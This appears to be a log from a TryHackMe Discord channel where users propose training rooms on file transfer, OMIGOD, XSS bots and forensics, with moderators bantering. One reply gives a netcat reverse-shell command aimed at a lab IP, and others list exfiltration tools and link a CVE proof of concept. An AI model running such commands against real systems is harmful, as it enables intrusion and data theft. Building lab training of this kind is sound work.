#room-ideas

What were you searching for exactly. Perhaps I can add keywords, get it added to a module or so

To be honest I was mostly searching dirb and dirbuster. Completely forgot to search for gobuster as well.

Also, a missed opportunity to not have it in the complete beginner path don't you think?

it's in the web path iirc

Can the attack box open in a new window instead of split screen? For us dual and tri monitor enthusiasts, and those that don’t want it on the right side, as we can also change the size of the attack box to what we are more comfortable with.

I feel wayyy more comfortable using openvpn for that reason despite being subscribed. I don’t know how others feel but just an idea 🙂

Yes, you can press the "+" sign located in the toolbar of the split screen view (:

Ah thanks so much

Are there any Windows/AD hardening rooms? I know there's a set of Ubuntu hardening rooms (which were very good), but I haven't seen the same for Windows.

AD doesn’t harden

it softens

Does when you configure it

False

Cry... you have a knack for making things vulnerable entirely unintentionally

Sorry you misspelled Windows

Sweetie, you're one to criticise spelling smh

Now, now fellas

will there ever be another cicada room, with it being named vol1? one of my favourite on thm.

I actually have another one done I’ve just been sitting on it as my focus has been shifted

Has anyone made a room dedicated to transferring files to and from a target machine? Covering all the possible methods on both Windows and Linux, using scp, powershell, simplehttp, netcat etc. There seems to be quite a few ways to do it from my experiences so far and I think a room that focuses on just this one aspect would be really helpful. If a room like this exists can someone point me in that direction?

I'd call that room something around "Exfiltration" and no I don't think there is one.

Yeah, that's an awesome name for the room - good call. Would be really appreciated if someone could make a detailed room on the topic!

Muir and I have discussed making it

And you could approach it both from blue and red perspective, actually exfiltrating data as a pentester, and detecting such activity in logging data as an analyst. Can do nice tricks with exfiltration via DNS or other 'rogue' methods.

But sounds like a lot of work to create 🙂

Even not going as far as exfiltration, copying files back and forth is kind of core.

If you guys do decide to work on it, I'll be first in line to work through the room! Would be super helpful to see a guided approach to some of the other methods that I haven't already got in my notes. Thanks guys.

Somebody linked me to an article that covered a bunch of methods. I can dig it up if needed, but I'm guessing James has it handy and/or memorized

There is https://attack.mitre.org/tactics/TA0010/ to start with 🙂

and https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

This is actually an idea that entered my head today too; the PreSecurity and I believe bits of Complete Beginner touched upon it, but would be great to have a room to really drill into it and drill the practice.

Heh, "Almost" is the operative word for that medium post

There are hundreds of ways to transfer a file. That's a decent list, but you can get a hell of lot more obscure than that 😆

Well James -- you up for it?
Once you're settled in at work and I've finished my current assignment?

I'm actually cool with creating a room like that. In a walk through scenario. But I don't want to step on any toes if someone is already doing it

I'm up for creating one unless youre already doing it

Maybe a room for perquisite knowledge before learning about Forensics?
and yes im suggesting this because i want to learn about forensics

ahh, hopefully you are able to release it sometime. It was a lot of fun doing the first one

Forensics is a broad topic, what exactly do you want to learn? Networking forensics? Mobile forensics? etc

Hi Friends, stuck at the very beginning of What the shell task 13. Been bouncing around this for a minute can't seem to move past any help would be appreciated. thx

I’m not 100% sure if this will work but try:
nc -e /bin/bash 10.10.111.100 22
Might be the order or that there aren’t a space in between the -e and /bin/bash

Oh and #room-help would be the right place to ask in the future :)

I assume you have a listener started somewhere?

Because you're currently trying to connect to an SSH server

so scp, python's http server, curl, wget, maybe updog?

base64 encoding and copy-paste?

Plus netcat, socat, /dev/tcp + cat, rsync, certutil, powershell, ftp.exe, wsl, and tonnes of others

There are quite literally hundreds of ways to transfer files

Heck, it's possible to make web requests using pure bash

yeah but that's a pain

I looked into it once and have up

copy paste was easier

I have a script for it

no doubt

i managed to get a DFIR course and with autopsy and i didnt wanna waste the course but it says that i need basic knowledge on forensics

I was doing the new autopsy room (https://tryhackme.com/room/autopsy) but it's not really going into how Autopsy works, just gives you an image and a list of artifacts you need to find in it.

That room was made private, if you want a walkthorugh on Autopsy I recommend this room https://tryhackme.com/room/btautopsye0

Does it still give points when completing after it's made private?

Nope

Private rooms don't award points

bummer, would be nice if it's visible somewhere that it's made private

after joining it, I mean

#feedback-and-ideas maybe request like a banner when you enter the room that says the room is private :)

Good shout jake

It's already there if you use the /room/ link

But it has to remain accessible for room testers

what does the /jr/ stand for? that would be the one where a banner would also be nice.

joined room, I suppose?

join room, lol

its more of a not as advertised feature of the site

Hi y'all! I made a room that has been in "ready" stage for a while now, any idea when it will go public? No rush, just wondering, because I'd like to add it to my resume the next time I update it

I believe that if it’s accepted to the site you should get an email once it’s scheduled to release but no clue about how long it’ll take

What if you made a room for FTK imager ?

Not a lot there to talk about IMO. It just does it’s job

what do you guys think about a room that involves reverse SSH tunneling to access a VNC session running on localhost after gaining initial access? could be an interesting priv esc, maybe the VNC session is logged in as root

I haven't come across a room yet that involved VNC or using any linux desktop GUIs so that could be cool

I have one, although it's in the private pool. Might see if I can get that released 🙂

yea that would be awesome, please release it for us 🙂

Not up to me, but I'll see what I can do 🙂

some more buffer overflow, shellcoding based rooms would be awesome

some which can teach you about stuff like basic variable value overwrite to how to detect bad chars in exploit code to maybe writing your own shellcode

Is there going to a Coding path ? This would be nice give some suggestive path to mastery. I would opt for Pyhon, C++ and Ruby.

a couple of python rooms have just been released

but i agree, a full path would suit well

@fickle idol Aweesome! Thanks for supa quick reply. I will check them out too. Thanks

Gave +1 Rep to @fickle idol

full coding path sounds like a bit of scope creep for a site like THM, there's also codecademy etc, I'd say spend the cycles our content devvers have on keeping up with all new hacking techniques and vulnerabilities going around. But hey that's just my silly opinion ;p

There's a feedback form in #feedback-and-ideas
This channel is for suggesting new content, not comments about existing content

was responding to the 'a full path would suit well' a few lines back, but ok 🙂

I just discovered the new Scripting for Pentesyers which is what I had in mind so I consider my request completed 🙂 . Just a shame C++ not there but that is a monster so I understand.

ah ye, understandable 👍

any chance my room "Intro PoC scripting" could be added to the new Scripting for Pentesters module? 🙂

Unlikely -- the modules have all been planned out and executed by the in-house devs

If that's a topic that's due to be covered, it will almost certainly be written from scratch by one of the full-time devs to slot in with other rooms in the module

Not sure if there already is one, but a room on BloodHound could be interesting

There is one

Could use some updating to include a lot of the new features

Well do it. It's your room smh

probably go on the list with all the grammar updates

hi, I have a couple of ideas that might make the regexp exercises go better. Though I'm not 100% that it would work, but instead of verifying a string, maybe have the values that needs to be matched in JS, and use the regexp passed by the user, use it to match the strings , and if it matches, then it returns ok

This solves the issue of trying many different options and not finding the expected way

That'd require a big overhaul on the site, like huuuuuge

wouldn't that be just a js file?

not sure how it is working right now, just an idea

Yeah, a large one that doesn't work anything like the existing method

Not really feasible for a room from a community creator

whaht do you mean?

Rooms can either be made by THM staff/paid for by THM staff, or created by people in the community.

oh, i see, didn't know that

Given how the rooms work as well it might be a bit tricky as well, answers are generally static today, within a given tolerance

Hey hey, can anyone guide me how to build a vm that is vulnerable to ms08-067?

can you not just download any of these os's listed? https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067

A room on AMSI?

In the works 👀

ez pz lemon squeezey done zo

If Cry's lucky I may even approve it

Hi, is there anyone who has finished NIS - Linux Part I? Those 2 questions of part1 come from nowhere. who tf is shiba3 and shiba4?

Guys I’m doing cybermentor’s PEH course.I’m going to focus on bug bounty hunting.
So can anyone plz suggest me which room to start

What abt starting web fundamentals room?

not quite the intended purpose of this channel @covert pier , however, Web Fundamentals sounds like a good place to start for what you want, yes

Ohh thanks bro

Gave +1 Rep to @rose cradle

I have a challenge I have created and would like to submit. Can someone direct me to the right contact or docs to upload?

I think the "Creating Rooms" section in the faq would help you https://tryhackme.com/faq

I just noticed i was in room ideas. My bad. Will try this today when I go back to it. thank you

Gave +1 Rep to @fallow flicker

what's the point of contact for Advent of Cyber contributions? 🙂

There isn't one -- the challenges tend to be built in-house, or by contributors on request 🙂

Having said which, @lunar plank would likely be a good point of call.
(Pinging ya for a definitive answer CMN 🙂 )

thx! 🙂

Are there rooms already present with Android Pentesting ?
If not an Intro Room would be good
Nothing sort of fancy but telling bout gennymotion and stuff. (Idk much too)

There's an adroid hacking 101 room and a mobile malware analysis room

Yeah
But like intro to android
How to get started and stuff

Since we can have 2 machines deployed at once, we can have some connected rooms which basically acts as a 2 machines network.

Have fun getting that through review

Kekw

I ain't testing that

Pentesting desktop application

https://tenor.com/view/clapping-leonardo-dicaprio-leo-dicaprio-gif-10584134

Not allowed in #feedback. But thought I'd drop to say thanks for the new content / rooms

Lot of new things to play with 👍

Anything in particular?

common vulns. I know that some are the same as those in web apps, but it would be nice to try them in desktop app as well.

Any app in particular though? Desktop app is a wide range

If it's binex, there are a few challenges around that

maybe something electron based?

If I’m doing a learning path, please don’t put me in a room and then link to another room halfway through. Put a snippet in so I can learn that one part I need to do the room I’m in, then give a link for if you want to learn more afterwards

As a room creator I disagree with that

I agree it shouldn’t be in the middle of a room

but it just clouds up the room a lot if we include random bits of information you need

Is it a prerequisite reference or a learn-more-here reference?

Would it be a good idea to add Metasploitabe2 & 3 ? Just as a warm up / punch bag / shooting gallery

that's kinda up to rapid7

youll need to reach out and ask for permission and how they want accreditation and all that

can we get a room on how tor works in-depth?

Sounds like a room for @naive notch

true that stuff he was posting before went right over my tiny little pee brain

I got a whole locally virtualised Tor network infrastructure with hidden services ready for deployment if they wanted to turn it into a network

is Marianas web real?

as far as I know, it's just a myth

https://hcommons.org/deposits/item/hc:20325/

What do you think about creating a room/module for Cisco security and configuration commands?

Would be very difficult to make that interactive

As you can't get legitimate OS images

What do you mean?

As in you couldn't make the room practical

because you can't run Cisco ios properly, due to the licensing

Oh I understand...

How unfortunate then lol

It'd be good content but the legals make it difficult

Yeah I get it

I was practicing with Cisco Packet Tracer and the idea came across my mind so I told myself why not talk about it

yeah i was looking into it a while back and packet tracer was the only option i found, so you could do it all within that

I didn't see any channels related to Try Hack Me's Twitter account but that is what I have an idea for. I think it would be fun to take advantage of Twitters Poll functionality but use it to ask a Cyber Security questions. ie:

What is the exploitation of a vulnerability, design flaw or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users?
Option 1: Cross Site Scripting
Option 2: Privilege Escalation
Option 3: Phishing Attack

Something along those lines, I think it would be fun, perhaps even make it a contest of sorts.

It would be cool if there are more badge to win
It'll feel rewarding after completing a room or a module

#feedback-and-ideas that will just get ignored here

Hello Guys !! I am just trying to create a new tryhackme room . Can anyone guide me about the network configuration of the VMS to be set before finally uploading it to tryhackme ????

Doesn't matter -- it all gets stripped out and replaced anyway

ok !! Thanks !

Gave +1 Rep to @native raptor

More rooms for code injection practice would be cool

domain clobbering?

Might be hard without proper dns

What sort of code injection?

Could be any but I'd like to see sql injections mostly. Those are pretty fun.

https://tryhackme.com/room/sqlilab try this one

https://tryhackme.com/room/yearofthedog if you want a decent challenge

Sweet! Thanks :D

Can I somewhere see which boxes are in the approval process, so I am not making box which is already being created? I was thinking about doing challenge about ROP/ret2libc because there is not a lot of content about binary exploiting on thm.

No, not really and I don’t see it being a feature at all. The easiest solution is to just join the creators lounge here and talk to other creators

There aren't, iirc. There might be soon though, depending on whether there's anything on it in here:
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering

Thank you a lot. That seems to be about exploiting windows binaries so I guess I am fine.

Gave +1 Rep to @native raptor

Mhm, exactly 😄

The room submission list is only accessible to room testers, although it is a great idea to ask in this channel about a topic before starting to build it. 🙂

I want to make a vulnerable machine,
So, from where should I start

I have no experience of developing a machine

https://youtu.be/XyEmZUpNVcI
https://www.youtube.com/watch?v=2qUWfrqAwdI

Thank you

Gave +1 Rep to @sleek elbow

How about a fallout themed room? That'd be fun

We can allude to it but we can’t directly make a fallout (game) room. That is assuming you’re referencing the game

The game series, yup.

Was playing new Vegas and it gave me the idea lol

@sterile igloo Hi, I am not sure if you are the right user. If you are the creator of CC Pen Testing, thanks for the room, might I suggest you add LinPeas on the privesc resources? https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

Gave +1 Rep to @sterile igloo

@native raptor Desktop? Right click?

Nvm I managed it

Pardon?

Nitro scammer. I am on mobile.

Oh, yeah

If they leave the server, I literally can't right click ban from mobile

Something similar to over the wire to better learn the Linux file system and commands? I really enjoy over the wire but the way you guys teach benefits me so much more than anything else. Something really really in depth

Like a tryhackme version of explainshell/overthewire if that makes sense? Not sure how to put it

You can check out this room
https://tryhackme.com/room/pokemon
Kinda same vibe

Will check it out today thanks 🙂

Gave +1 Rep to @odd knot

Idea: a company that did a pentest some time ago and now it's our turn to do a pentest. make use of artifacts left by the previous pentester(s). For example: a previously vuln upload function got patched but the payload uploaded by the previous pentester didn't get cleaned up, allow us to get something like an RCE despite the upload being patched.

If a pentester leaves an artefact like that behind then they deserve to be fired on the spot. Everything needs to be cleaned up. Assessors should not be leaving payloads, tools, or anything else behind -- with the occasional exception of some method of proof of compromise chosen by the client.

I believe I've heard stories of pentesters sometimes leaving some artifact behind like maybe a golden ticket with default credentials

Which means if that happens, the scenario should be following the footsteps of an attacker. Look at Overpass 2 (I believe) for that.

My idea was that this uses the uploaded exploit even though it's been patched.

If that's true then that is not a pentesting team that should be getting any work. Leaving stuff that can be used to compromise the client behind is incredibly serious.

Like, they would have grounds to sue you for criminal negligence. That kind of serious.

Well it was something I heard somewhere on youtube or something, so I don't know how things went for those testers

The pinnacle of informational accuracy of course 😆
But yeah, if you want a "follow the attacker's trail and use their payloads to get into a patched system" thing, check out Overpass 2

overpass had a lot we can trace, even a packet dump I think. I wanted something less obvious

exploiting something that's been patched was the idea

Actually, y'know what, that may be doable 👀

As a hint, we can have another packet dump or a note talking about the previous engagement

ree

hello @karmic raven

hello cutie @lunar plank

how has your week been, big man?

good! Its been really busy

keeps you somewhat out of trouble I suppose 😄

how about an omigod room?
has someone an idea where to get an omigod affected VM?

I know where to get one but we have to use caution with just dropping malware sites

also AWS would not vibe with that idea they’re super strict

or we could just install an old OMI versions

https://github.com/microsoft/omi/releases/tag/v1.6.8-0

I mean we could but it would probably be decently difficult to set up and along with that it is being actively exploited so we can’t really release anything now

There is a patch available, is there not?

well https://github.com/horizon3ai/CVE-2021-38647

The big problem is realism. An AWS VM affected by an Azure vulnerability

it doesn't have to be an original "big 3" VM, has it?

i think it's more about the OMI CVEs

(when it comes to building a room)

I'm setting up an ubuntu vm an install v1.6.8-0 to see if the PoC works on it

I mean, you should be able to install it on any Linux machine, in theory 🤷‍♂️

let's see 🙂

patch != updated and no longer being exploited

same thing happened with zero logon and a bunch of others

No, but it does mean that the option is there for people to update.
The way we've handled that in the past is making the content about now then releasing it when the exploit calms down a little

yeah, either way it would need to chill for a bit

Nowhere near as long as it would without a patch though

i could install omi 1.6.8-0 and 1.6.6-0 and start the server (ports open) but Idk how to configure it with the basic auth. the PoC exploit just won't work. idk

I was working on a room about this vulnerability

But I would like to explain why this vulnerability is generated and that part would take me some time, Anyone want to work this part ?

the problem of OMI is that if you send the request without the authentication header you would have no problem executing the commands.

it can be seen that they are only defining the content type header becasue not necesary the authoritation header.

if you will send this request making the authorization header with invalid credentials you would get a error 401.

I have understood the vague principle, but how detailed would it have to be?

I had a look at the releases' source diff but wasn't able to spot "that one" line of code straight away

could it be here?

Hello there, i have some questions regarding room creation

Anyone ?

you have not asked a question

Can i dm you?

sure

A more in depth guide to understanding the Linux file system maybe? Linux funds part 4 5 6? Something of the sorts

What more is there to understand?

it’s pretty basic tbh

Hey
In the meantime there is an OWASP Top 10 of 2021. Would anyone like to make a new room? So far I have only found this one for 2017: https://tryhackme.com/room/owasptop10

The 2021 is still a draft, not finalised

that means it should still be used 2017?

2017 is still the current one

I see
thanks!

Having more post-exploitation stuff will be nice.

It would be great if TryHackMe could add some more OSINT rooms, and some rooms dealing with pentesting report writing.

Is there any guide or forum post for creating code blocks inside a room like this one? I would like to implement it in my own room but couldn't find any information about it.

@orchid dragon https://carbon.now.sh/

@lament star @orchid dragon It's pinned in creators lounge, Quick I can add you if you'd like.
Using carbon is bad because it's images of code, not accessible to screen readers.

Yeah that's exactly what I was thinking. That would be awesome if you could. 😅

How about Stored XSS using <iframe> and SVG upload to leak cookies or other stuff?
Is there a room about this?🙂

BTW, how does the room with XSS run the JavaScript code?
Is it phantomJS or something similar they make use of?

pretty sure it doesn't actually run it

But I had a WIP POC for a new version that used Selenium

What do you mean by this?
They don't run it
For instance, there was room by timtaylor
Where we could create a Ticket that is read by the Admin which exploits Stored XSS to perform some action as them
How do they run that JavaScript code?

The XSS room? Tht wasn't by Tim.
Probably just getting a browser to visit the page.

Ok, it might be some other creator than
I should first check the room name 😅
Thanks🙂

A selenium headless browser fetching the Admin page as a cronjob 🤔

That is one way to do it, there are many ways to automate browsers

I can't add a reaction to your posts smh
Please let me know if I have broken some rule😅
Thanks, I got it what to do now😁

i use puppeteer (node) for my xss stuff, there’s also a python fork of it

probably the simplest way, puppeteer uses a headless Chromium no?

PhantomJS is basically dead afaik

I had used it in the past, didn't know about the current tools 😄
puppeteer, for default installation, uses its own version of Chromium

And Chrome and Chromium now supports headless, not a separate package🤔

yeah, I've had issues with phantomJS in the past

also https://github.com/ariya/phantomjs/issues/15344

something like that, i can send the xss i use through all my xss projects if it helps people

might be interesting to put a poc on github

eh, someone can stick it on github if they want:

const puppeteer = require('puppeteer');

(async () => {
    const browser = await puppeteer.launch({ ignoreHTTPSErrors: true, args: ['--no-sandbox'] });
    const page = await browser.newPage();

    await page.setCookie({ name: 'login', value: 'cookie', domain: 'localhost' });
    await page.goto('http://localhost');

    await browser.close();
})();

ettercap room?

a room showing how a VPN doesn't really make you as anonymous as much as ads claim?

I feel like having a room for that might be a little overkill, maybe a room on setting up your own VPS and a breakdown on how they work? ^^

you mean vpn jabba?

You could do that with a pcap containing a lot of vpn and non-vpn traffic, and having the user correlate in that data. Like visiting the same sites, time pattern analysis, etc.

and/or "leaked logs" from some provider that would contain the unencrypted data that was going through the vpn at some time

Whoops sorry, mind was preoccupied :p

With the https://tryhackme.com/room/palsforlife room in mind, a room like the docker escape room but with possibilities to abuse kubernetes would be pretty fun 🙂

If you're looking for anonymity then maybe VPN is not a good option, but that's a good suggestion and hope it helps ppl to have less issue with VPN here

I'm wondering how feasible a full on malware reverse engineering room would be. I'm taking a malware class in grad school, and it's super cool, although I'm trying to think if there's a way I could render some of the stuff I'm learning into a room. I'm thinking a VM running Ghidra or IDA would be super slow on THM, and I'm not sure how AWS would like us hosting a room with a live malware binary. I know we have a malware RE room, but it's just an RE ctf. I'd love to do a walkthrough reversing a real sample. Anybody have thoughts?

We already have multiple rooms on this topic

i know cloud has been talked about a lot before - but if anyone is an aws wizard, i think a room on using the aws cli with localstack (https://github.com/localstack/localstack) would be a great compromise :)

Good idea. 🙂

I am not sure if it could be applied to jake's suggestion, but maybe combining AWS + Pacu exploitation framework? https://github.com/RhinoSecurityLabs/pacu

Not sure how Pacu would deal handle localstack but it would be a great tool to showcase if it works with it

Attacking Kerberos Task 4 need to get hash file; it is a bit hard to get it intacted. I use this method to get it easily ; cat hash.txt | tr -d " \t\n\r" > hash1.txt , then use hash1.txt

Can everyone publish rooms?

you can create a room, there is a review process before it is released

Okay, thank you!!

And is there a way of entering the review process before the room is 100% done so to make sure I don't create it for nothing?

the room has to be 100% when it goes to review, you will get feedback on the review, request the "Creators lounge" role from a mod and you can ask questions in that channel

Thanks!! c:

Hi

Guys, you can make a room info for the Hacking hardware, it would be cool, and revolutionary

yes like hackrf based something

someone know a way to use the discord token

@molten osprey This channel is for suggesting new tryhackme rooms

oh ok

sorry

itll probably take a ton of time to make but an osx room would be cool

how would that be made? Its practically impossible

I say that lightly because theoretically its possible but its also really weird

I know but as a one time thing it could be cool

Okay, but how

Idk it was just an idea😭

Osx?

MacOS

Ah

Do we have room about XOR ?

As in, the concept of bitewise exclusive or..?

Yes something like that

and maybe even some challenge rooms about it to decrypt them

That would have to be in amongst a bunch of other encoding methods -- it's a very simple concept, so it's not really enough for a room by itself

Okay

I was just wondering 😄

Do we have a room about FTK Imager?

Is one of the most used tools in digital forensics

It’s on my list

@ashen lagoon ^

A room where we to use autopsy tools, I want to use and learn it like it has been in VMs for a long time

Awesome

A room where we to use autopsy tools, I want to use and learn it like it has been in VMs for a long time

Hey creators ,can you tell me which distro is the best and simple ?

For THM VMs? Ubuntu 1804/2004 server or CentOS 8 Stream/8.3

Thanks

Maybe someone doing a walkthrough of an easy+medium+hard Box? Like a really in depth uncut walkthrough explaining their entire thought process and why they did what they did and thought what they thought. This isn’t really a room idea I know but these kinds of videos would be very helpful for everyone of all kinds of skill levels. Kind of like how in depth Miuri goes on the boxes that he makes if that makes sense.

I’d pay to see that tbh

Especially if it was Miuri (no offense to anyone else sorry just the way he explains things, I just get it)

A room on the dangers of Adb and how easily exploited it can be could possibly be a nice little addition. Especially with android embedded TV boxes ect in most places these days.

So a write up? That’s already a thing?

you know youre right, im not a very bright person as you might have noticed

I hate doing video walkthroughs -- I'm too much of a perfectionist 😆
Might be convinced to stream at some point though

Your rooms say otherwise

Coming from you, nematode smh

my rooms are perfectly crafted works of art, to what are you referring?

That's funny. My three year old cousin called this drawing he did at nursery a perfectly crafted work of art too:

Considering your emotional and intellectual maturity levels are both about the same as that of a three year old, it checks out that you would also consider your rooms to be perfectly crafted works of art when, in reality, they're really just crayon scribbles on a page 🤷‍♂️

you sure you didnt get me and you mixed up? You sure there isnt a reason they have you make the easy to explain rooms little timmy?

Who is the target audience Cry?
They have me front and centre. They have you off at the side playing with toys in your sandbox writing stuff no one reads (mainly because it's wrong) 🤷‍♂️

😁

Sorry you can go and explain your little web app bs and how to use your first exploit for kindergarteners whilst I write the content for the grown ups

smh. I think we both know what would happen if I got asked to write the exploit dev stuff Sweetie ♥️

Yeah, I know exactly what would happen

You would come crawlin up in me DMs asking for help

Oi Cry! Oi Cry! Please Help! I have no clue what Im doing with small monkey brain

Riiiiiiiiiiight 😆

That's what I have Spooky for 🤷‍♂️

Why have the cheap knock-off when I can have the original?

Photoshopped 🤷‍♂️

That didn't happen

Or, more likely inspect elemented

Even if that were true though, it proves nothing. "Awesome" doesn't mean "Better than mine"

Said the doctor at your last check up

(For anyone watching this and wondering what the heck is going on by the way, I would like to make very clear that this is a long-running joke. We do not actually hate each other)

Muiri arent your supposed to be the lead mod and ensure everyone uses the appropriate chats. This chat doesn't seem very appropriate

Is that why they gave you the lead mod role?

Because you werent good enough for anything else?

Meh, perks of the position 🤷‍♂️

May I remind you: I outrank you 😆

May I remind you: I'm the one with a job and not a volunteer

Meh, I work in industry as a day job -- you don't 🤷‍♂️

https://tenor.com/view/discord-mod-july-meme-southpark-gif-22244170

https://tenor.com/view/kid-angry-gif-22128887

Cry be like

You trying to make fun of the fact Im asian?

seems targeted.

A) You're not Asian, Sweetie. I have a photo of you, remember?
B) No, you're a child, and we both know it smh

must be to compensate in other areas

How are you going to tell me what I am and am not

....

Really..?

(I guarantee everyone watching is super confused rn)

That was a stretch, even for you 😆

@native raptor Youre distracting me from my big boy work

Cry, the day you actually do any work without someone sitting you down and standing over you to make sure you do it will be the same day Hell freezes over

The day you contribute anything useful will be the day I begin to actually use more than 5% of my brain power

Oh Sweetie, I contributed useful things before you started learning to hack ♥️
You keep fooling yourself, but it's slightly sad that 100% of your brain power is equivalent to everyone else's 5%

Muiri babes, pinging google.com doesnt count as contributing

Remember who helped you fix all the crap in your very first room?

Heck, did I not have to set up a Python webserver on that Cicada box for you so you could take material off it for a full rebuild locally because you didn't know how to make one?

It doesnt even have any infrastructure running ding dong

Look back at our very first messages

I had to set you up a webserver on it for some reason

Might have been to transfer files from the AttackBox

Muiri bb

weve single handedly made this channel useless

Ickle baby Cry before he developed an ego. So cute!

Also true 😆

I have an ego because I can run laps around you little babes

You wish

Stream Miuri

I’m not asking

Can I dm you ?

With regards to?

I'm thinking to Create a room

morning miuri

-arole @opaque bronze Creators-Lounge

➕ Gave the role Creators-Lounge to A R U N#5174

You would be better asking in there

Sure

it was a nice chat between you guys Muiri vs Cry 😂

Hey, put a bash scripting room please

I've actually learned for other sites, but I think it may be a cool topic

https://tryhackme.com/room/bashscripting

What's this..?

LOL thx

Gave +1 Rep to @native raptor

Maybe have a look to see what exists before requesting that someone builds it...
Research is the key to hacking. Not a great look if you can't find the learning materials 😆

Has anyone suggested an SW Orion room, to exploit https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-14005?

Had it in the wild, might be a good teacher of how default creds can ruin your org.

That’s an enterprise platform so we probably couldn’t get it on our infra

Bummer.

I am working on a New Networking /Recon Room. I hope I can release it next weekend!

Bear in mind that they go into a queue for review, then get scheduled for release 🙂

Hey someone who has pentest experience should create room which cover pentest report writing.

The issue there is making it interesting and interactive

It would be ridiculous for the creator to mark or even just read each pentest report

You can have some users mark them in exchange for points or like a title or something

It wouldn’t be that efficient but could be a nice experiment to see how the community reacts to stuff like this

Or you could do wreath instead

Wreath is lowkey fun but how is it related? Not trying to be rude btw

The writeup is expected in report format, and there's a short section on writing the report

Ohh true

And honestly a ctf platform isn’t meant to teach you how to become a pentester that is ready for a job😂

Imagine coming to a job interview being like “yeah I’m god on THM and finished all the networks”💀

Believe it or not, people do, and get hired 😆

THM is also used extensively by companies and universities looking for training 🤷‍♂️

A lot of the challenges aren't particularly realistic, but most of the walkthrough stuff is.

Oh that's awesome I didn't know that xD

I try to make my challenges somewhat realistic.

or at least something a forgetful admin and/or dev might do

I have an interesting concept in mind, but I'm not sure if it's viable yet

What is it? Now I’m intrigued

(Not sure where to send)
Can you please add "vip/free" tag here? This will help to practice VIP rooms first .....before ending subscription

Drop this into the form at #feedback-and-ideas

This is a good idea, it's currently only available in Modules on this page: https://tryhackme.com/hacktivities. For example, the module you're looking at: https://tryhackme.com/module/intro-to-web-hacking
Hope that helps. 🙂

Hi Muiri I know, thanks

Gave +1 Rep to @native raptor

I have send this to Feedback page. But there is no option to add image. So I am not sure whether they will understand my feedback or not

@cedar echo

K

Dope

It was posted in a bunch of ither channels too

Saw

Ok. Cool. Just making sure

Hello. Is it intentional that the "Active machine information" div sticky normally but is not as soon as you launch the attack machine (split view in general) ??

to be honest, would be cool, i think, to make it sticky in the split view again so i dont have to scroll up for the ip if i happen to need it again, especially with rooms with couple of machines

Interesting, good idea.
This channel is more for suggesting rooms you'd like to see. For site feature suggestions, you'd probably be better filling out the form that's in #feedback-and-ideas

Sure thing 🙂 thanks

proxychain tutorial

Wreath, Holo, Throwback

Also a few challenge rooms which require its use as well IIRC

There should be a learning path for more different eLearn security certs

WAPT, WAPTX, and PTX should all be learning paths

Or SANS training IMO

Or Offensive Security’s OSEP, OSWE, and OSED IMO

We need dynamic flags. Static flags are being shared.

creating paths for certificates potentially brings legal issues. iirc the offensive security path was named something like "OSCP prep" and offsec had a problem with it

this ain't HTB 😂 most rooms have a writeup so it's not really a big problem

I put dynamic flags in my newer challenges, but it's not a site-integrated feature.

As optional says -- we don't really care. THM is about learning -- if you steal flags then the only person you're cheating is yourself.

We don't need flags at all. 😉

This. Unless it's directly in collaboration with the provider like the Pentest+ path, it can get difficult quickly

Aye, but you-know-what ain't exactly gonna be widely available

Why not create an advanced web hacking path that is meant to be done after web fundamentals?

Or a senior penetration tester path?

And does the offensive security path no longer prepare students for the OSCP material wise?

Or is it just the name that was changed

Why not ask more providers to collaborate with?

Like eLearn or something

Or some other provider?

Or OffSec even?

Like maybe if Offensive Security was ok with it in advance it would be ok?

It would, but they won't

Why would they? They have PWK, the OTL, and their own labs. THM having official training for it doesn't offer them anything.

Basically

Same applies as above with Offsec

Who says those aren't being built? 👀

Ok. What about an intermediate and advanced web hacking path?

Or wireless hacking path?

Etc?

Most cert providers offer practical training for practical certs. THM doesn't offer anything on top of that

Again 👀

Ok fair

How long will it be before more advanced web hacking pathways will be available probably since you just said they are already being built?

I said they might be being built. I can't go into any details on upcoming stuff -- that's above my paygrade I'm afraid. I do know there's some fun stuff planned for the not too distant future though.

It would be great to have everything required to be able to start bug hunting in one place lol

Thanks for the honest answers

What kind of room ideas would you like to see for these two? 🙂

i'd like to see more "evasion" techniques personally

the way the challenges were presented in this room (task 7) was really nice: https://tryhackme.com/room/xssgi, and imo went further than i would expect for a jr level. but the same type of idea for more web vulns would be nice (xxe, ssrf, request smuggling, deserilsation)

I would like to see a mega course in intermediate to advanced web hacking that teaches essentially is as in depth as pentesterlab and/or portswigger but also covers tools, and then an even more advanced course to master applying Python to web hacking at a really in depth level

And maybe knowing Python separately would be a plus

I also think something similar should be done for wireless hacking and network hacking

Ideally

With Python as well but before that covering basics of wifi hacking, MITMs, etc, and going all the way through hacking Enterprise wifi

And also learning path for Kali SET

I also think that I would like to see a room or two for report writing

Like how to write reports

Have you done Wreath? :)

Do you have this bound to a key yet?

I should honestly just get the bot doing it

Oh cool we do have a report writing room I didn’t know that

Yeah I mean I really want to aim the complete all the current learning paths in six months

Hopefully by then new ones will be up

Would you say that’s a valid thing to hope for?

We obviously cannot say a lot about what we having going on behind the scenes

we have a lot going on and these things take a lot of time and effort to put out

be patient. This channel is really here for suggestions of 1 or 2 unique rooms not a whole multiple path outline that would potentially take us months or years

Ok. What about a room on hacking enterprise wifi?

I feel like the different ways of hacking enterprise wifi could be a room in of itself

an advanced room

maybe you could include it in a future learning path, like if we ever have a Sr. Penetration Tester path

etc

im in network services 2, and im doing the enumerating NFS task 3. this scan takes nearly 2 hours to complete. this has made it very difficult to complete as i dont often have 2+ hours to spend on the scan, alone....

Why not to create paths that focuses on other careers than penetration tester and security analyst such as security engineer, consultant or even CISO

I would like to see an SELinux room, trying to find some good resources on setting up and good practices etc, not finding anything that really stands out, maybe not searching hard enough 🙂

I agree that a room revolving around SELinux would be great, I've considered making one after I get a bit more free time.
In the mean time, I hear the SELinux colouring book is good.

If only there were 24 more hours to the day :) thanks Will look that up

Gave +1 Rep to @somber crow

I know we aren’t supposed to give learning path ideas but I am wondering why no Linux or Windows specialty learning path exists

Couldn’t an entire learning path be made out of one of either OS?

I mean we have enough material already on the site it just has to be organized right?

Elaborate what you mean mate

make the user without root access called "root" to troll

A room about SAML and signature bypass techniques.

Holo has signature bypass techniques

Don't know if that's possible

I could use a signature bypass to test my current dev...

